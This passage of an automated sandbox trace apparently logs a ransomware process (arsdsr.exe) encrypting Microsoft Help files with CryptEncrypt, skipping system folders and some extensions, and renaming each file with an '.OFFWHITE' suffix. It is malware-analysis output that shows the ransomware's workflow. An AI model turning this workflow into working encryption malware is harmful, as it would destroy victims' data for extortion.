lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x158, lpOverlapped=0x0) returned 1 [0147.448] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.448] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x158, lpOverlapped=0x0) returned 1 [0147.448] GetProcessHeap () returned 0x500000 [0147.448] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.448] CloseHandle (hObject=0xb0) returned 1 [0147.449] GetProcessHeap () returned 0x500000 [0147.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.449] GetProcessHeap () returned 0x500000 [0147.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.449] GetProcessHeap () returned 0x500000 [0147.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.449] GetProcessHeap () returned 0x500000 [0147.449] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.449] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0147.449] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.OFFWHITE" [0147.449] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.offwhite")) returned 1 [0147.450] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.450] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.450] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.450] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0147.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.450] PathFindExtensionW (pszPath="MS.MSACCESS.DEV.14.1033.hxn") returned=".hxn" [0147.450] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.450] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.451] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.451] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.451] GetProcessHeap () returned 0x500000 [0147.451] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526bf8 [0147.451] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.451] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=368) returned 1 [0147.452] GetProcessHeap () returned 0x500000 [0147.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.452] GetProcessHeap () returned 0x500000 [0147.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.452] GetProcessHeap () returned 0x500000 [0147.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.452] GetProcessHeap () returned 0x500000 [0147.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.452] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.452] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.452] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.453] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.453] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.453] SetLastError (dwErrCode=0x0) [0147.453] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.454] GetLastError () returned 0x0 [0147.454] GetLastError () returned 0x0 [0147.454] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.454] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.454] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.454] WriteFile (in: hFile=0xb0, lpBuffer=0x526bf8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526bf8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x170) returned 0x52ebe8 [0147.455] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.455] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x170, lpOverlapped=0x0) returned 1 [0147.455] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.455] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x170, lpOverlapped=0x0) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.455] CloseHandle (hObject=0xb0) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.455] GetProcessHeap () returned 0x500000 [0147.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.455] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0147.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.OFFWHITE" [0147.456] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.offwhite")) returned 1 [0147.459] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".") returned 1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="..") returned 1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="...") returned 1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="windows") returned -1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="rsa") returned -1 [0147.459] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.460] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="programdata") returned -1 [0147.460] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="appdata") returned 1 [0147.460] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="program files") returned -1 [0147.460] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.460] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.460] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSOUC.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0147.460] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.460] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.460] PathFindExtensionW (pszPath="MS.MSOUC.14.1033.hxn") returned=".hxn" [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.460] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.460] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.460] GetProcessHeap () returned 0x500000 [0147.460] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c08 [0147.461] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.461] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=326) returned 1 [0147.461] GetProcessHeap () returned 0x500000 [0147.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.461] GetProcessHeap () returned 0x500000 [0147.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.461] GetProcessHeap () returned 0x500000 [0147.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.461] GetProcessHeap () returned 0x500000 [0147.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.461] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.461] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.461] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.462] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.462] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.462] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.462] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.462] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.462] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.462] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.462] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.462] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.462] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.462] SetLastError (dwErrCode=0x0) [0147.462] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.464] GetLastError () returned 0x0 [0147.464] GetLastError () returned 0x0 [0147.464] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x246, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.464] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.464] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x346, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.465] WriteFile (in: hFile=0xb0, lpBuffer=0x526c08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146) returned 0x51d650 [0147.465] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.465] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x146, lpOverlapped=0x0) returned 1 [0147.465] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.465] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x146, lpOverlapped=0x0) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.465] CloseHandle (hObject=0xb0) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.465] GetProcessHeap () returned 0x500000 [0147.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.466] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0147.466] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.OFFWHITE" [0147.466] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.offwhite")) returned 1 [0147.466] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".") returned 1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="..") returned 1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="...") returned 1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="windows") returned -1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.466] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="rsa") returned -1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="programdata") returned -1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="appdata") returned 1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="program files") returned -1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.467] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.467] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.MSPUB.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0147.467] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.467] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.467] PathFindExtensionW (pszPath="MS.MSPUB.14.1033.hxn") returned=".hxn" [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.467] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.467] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.467] GetProcessHeap () returned 0x500000 [0147.467] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c18 [0147.468] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft 